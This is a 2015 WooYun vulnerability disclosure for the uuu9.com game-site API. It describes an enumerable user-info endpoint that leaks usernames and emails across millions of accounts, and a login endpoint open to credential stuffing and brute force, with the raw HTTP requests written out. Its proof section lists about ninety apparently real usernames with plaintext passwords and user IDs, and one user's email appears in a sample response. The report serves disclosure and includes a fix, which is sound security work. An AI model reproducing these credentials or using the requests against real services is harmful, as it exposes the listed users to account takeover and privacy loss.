当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113584

漏洞标题:游久网某接口设计不当可导致用户部分信息泄露(一千万)+撞库爆破

相关厂商:uuu9.com

漏洞作者: 小手冰凉

提交时间:2015-05-12 10:11

修复时间:2015-06-26 10:42

公开时间:2015-06-26 10:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-12: 细节已通知厂商并且等待厂商处理中
2015-05-12: 厂商已经确认,细节仅向厂商公开
2015-05-22: 细节向核心白帽子及相关领域专家公开
2015-06-01: 细节向普通白帽子公开
2015-06-11: 细节向实习白帽子公开
2015-06-26: 细节向公众公开

简要描述:

游久网某接口设计不当可导致用户部分信息泄露(一千万)+撞库爆破

详细说明:

看小满dota视频,最后推荐了一个游久的app,测试之....
发现如下接口

POST /Member/info.html HTTP/1.1
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Host: api.yoyo.uuu9.com
Connection: Keep-Alive
User-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)
Accept-Encoding: gzip
uid=12423778&onlymark=d8cc53dc-598a-3ec8-8875-cadaf3b20e01skk


返回用户个数据信息

{"state":1,"info":{"username":"lqh47258","email":"83640544@qq.com","bg_1_link":"http:\/\/api.yoyo.uuu9.com\/Public\/background\/default1.jpg?t=1431394782","bg_2_link":"http:\/\/api.yoyo.uuu9.com\/Public\/background\/default2.jpg?t=1431394782","background":1,"bg_link":"http:\/\/api.yoyo.uuu9.com\/Public\/background\/default1.jpg?t=1431394782?t=1431394782","headimg":"http:\/\/u.uuu9.com\/uct\/avatar.php?uid=12423778&size=small1431394782","gcount":null,"fcount":null,"ccount":"0"}}


测试发下这个uid可以遍历,从范围是(1-12423778) 一千万!!前几个是管理的用户,看用户名就能看出来 末尾随着注册人数的增加还在增加。有这么多用户?随机在这个范围内产生了一万个发现确实是真实用户数据。

捕获.PNG


另外还发现了撞库爆破接口:

POST /Member/logintest.html HTTP/1.1
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Host: api.yoyo.uuu9.com
Accept-Encoding: identity
username=<用户名>&password=<明文密码>&onlymark=d8cc53dc-598a-3ec8-8875-cadaf3b20e01


不仅能撞库,还能爆破,依然使用csdn库测试。

漏洞证明:

撞库部分结果(管理打码)

mockmoon8336187:8336187asd	uid:5007940
ziyem4:19821220 uid:1315505
oetzi365:19831201 uid:4299799
cjlcjling:2590530cjl uid:3718539
xj1988088:383854380 uid:3077302
hyf1129:19891129 uid:7015413
kingdomtbk:19851031 uid:463588
jenny8288:56133719 uid:549655
zengchihai:z61454654 uid:3109949
zenghaibo1989:zhb7221162 uid:9515443
crazy_demon:angelyys16 uid:2460079
heng19861229:heng1025 uid:4901596
wjwshmily:wangjiawei uid:1265276
c_jianwu:103104103 uid:4479645
lzzeddy:liuzaizhe uid:3060429
idiotddk:11111111 uid:3574892
free514689263:fnhmqj890912 uid:4010947
lx262853530:lx19891029 uid:3295305
q916613618:513148977 uid:6746443
himalayashf:hf19890408 uid:2772770
zuyfg520:19891106 uid:5079172
wenchongqi:19821020 uid:2060863
szyqita:zhiyong1986 uid:3758154
yanpingwan:sentimental uid:5553554
snow9155:yanhan9155 uid:4152779
juy23174:juy1392010 uid:1245955
xixbnb:56770165 uid:3389146
wbc1988:1988414a uid:10023488
tianrun2:55028006 uid:994897
fanss123:12354321 uid:630019
yechaoys:2576267YeChao uid:4158613
jy3204183:hjwisatc uid:551692
zh6486007:13802709418 uid:2421168
lubony:82250755 uid:8264909
iawpa:779042174 uid:3461872
htq19870607:53286566 uid:1411383
fairyilove:liuxianwan uid:3086253
lengwing1:wingshadow uid:2457728
maple0620:88499926 uid:4411327
hubeixuxi:hubei1988914 uid:3497491
tank39573:86868025 uid:267117
yxl1118:250103271 uid:5147687
yonghaoyip:199462112 uid:2346989
h357515283:19870824 uid:3742181
iceify:iceify_99 uid:3831679
ljg2353:23531420 uid:3908969
liuziyi708:850318108 uid:4565277
ad51241131:ad51241133 uid:1178910
hcc1989:arsenal0577 uid:1714212
gaiahc:22303712* uid:4637621
chx19357:chenhx19357 uid:3639413
w174184047:68086390 uid:4546860
tony871018:tony5212129 uid:1785540
jy02192915:ly86710467 uid:3951091
txh100:steers19841122 uid:4847243
qiandai1988:huijiejie1988 uid:1709544
dawang117:qq123456 uid:598327
simoncxl:5845211314 uid:4223670
lgl198842:qweasd1214 uid:3291243
rk136283613:woshishe uid:2724497
zhumashutou:258468895 uid:1919266
zxc129102:19941002 uid:2285649
wuyonglin1993:32201937 uid:1060252
luck5566:changeme uid:888217
zl315524506:ymx5897665 uid:4328202
jianxing2001:gashnr54r uid:5132457
jk2661809:1598753624 uid:1956888
fzg1994:526201344 uid:1814302
ll2921892:LWZL139791 uid:2889071
sunoosmile:zlxlyr988225 uid:5025925
newtangkai:tangkai3 uid:6623387
davewang1218:5242879qs uid:4177601
hrq4399:qq000000 uid:3417280
z241116778:6354968200 uid:3378486
wannianzhilang:pipiaidag uid:5746376
borty:19801210 uid:706344
zj1990222:hx1988919 uid:2171430
leek1987:lik1987229 uid:1449751
zhongyi_555:13868687332 uid:3389151
areyouaboy:youareaboy uid:3408614
virgoviolet:19880427 uid:5230352
jk0411:68514355 uid:3449360
new11:12345678 uid:2016084
zhuasenven:senvenzhua uid:4230563
gqllove:820834502 uid:3583813
swdefrgt:fbta11sj uid:3502244
ilovesilc:50694208 uid:2197073
weee430:asd5526157 uid:4610581
qq864394800:866226770 uid:4574883
seven19871016:z1650232 uid:3435368
loverockxqb:19850821 uid:4602251
huxin987:84853668 uid:4412797

修复方案:

增加验证防止信息泄露
增加接口使用限制防止撞库爆破

版权声明:转载请注明来源 小手冰凉@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-12 10:41

厂商回复:

感谢提醒,已安排程序处理

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-12 10:15 | 小手冰凉 ( 普通白帽子 | Rank:174 漏洞数:18 | 幸福你我他)

    no no no no no no 又是小厂商么?@疯狗 又没有打码么?